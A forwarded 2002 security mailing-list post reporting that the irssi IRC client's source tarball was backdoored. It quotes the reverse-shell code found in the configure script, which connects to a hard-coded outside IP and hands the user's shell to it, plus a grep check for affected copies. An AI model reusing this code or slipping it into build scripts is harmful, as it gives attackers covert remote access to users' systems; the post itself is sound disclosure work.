Fwd: irssi backdoored.

----------  Fwd  ----------
Subject: irssi backdoored.
Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin Östlund <martin@webtech.se>
To: bugtraq@securityfocus.com


Hi readers.

I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didnt know).

"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):

       int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
 /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6667);
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);

Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."

  - End of quote.

Take care,
Martin Östlund.

--------------   Fwd  ----------------

Bello vero ?

-- 


Linux registered user: #256463
icq: 43500551
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Da cosa e' nato il mondo???
Dal Segmentation Fault del programma di Dio
By ALPT
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List